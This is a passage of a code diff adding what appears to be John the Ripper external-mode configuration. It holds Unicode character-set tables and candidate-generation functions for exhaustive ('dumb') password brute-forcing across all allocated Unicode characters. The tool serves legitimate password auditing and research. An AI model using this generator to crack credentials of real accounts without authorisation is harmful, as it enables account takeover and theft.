+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+	/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
@@ -0,0 +1,2368 @@
+# This  software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Generic implementation of "dumb" exhaustive search of FULL Unicode.
+# Default is to try *all* allocated characters in Unicode v11 (there's
+# 137,046 of them). Even if a fast format can exhaust two characters in one
+# hour, three characters would take 12 years...
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 12 bytes each).
+#
+# Also note that for UTF-16 formats, the resulting plaintext size within the
+# format will be up to four bytes (two 16-bit words) due to use of surrogates
+# for characters above U+FFFF. This means a format which normally handles up
+# to 27 characters may be limited to only 13 characters, worst case.
+[List.External:Dumb32]
+int maxlength;            // Maximum password length to try
+int last;                 // Last character position, zero-based
+int lastid;               // Character index in the last position
+int id[0x7f];             // Current character indices for other positions
+int charset[0x22000], c0; // Characters
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 2;
+
+	# UTF-8 representation is up to 4x the character length
+	if (maxlength * 4 > cipher_limit)
+		maxlength = (cipher_limit + 3) / 4;
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
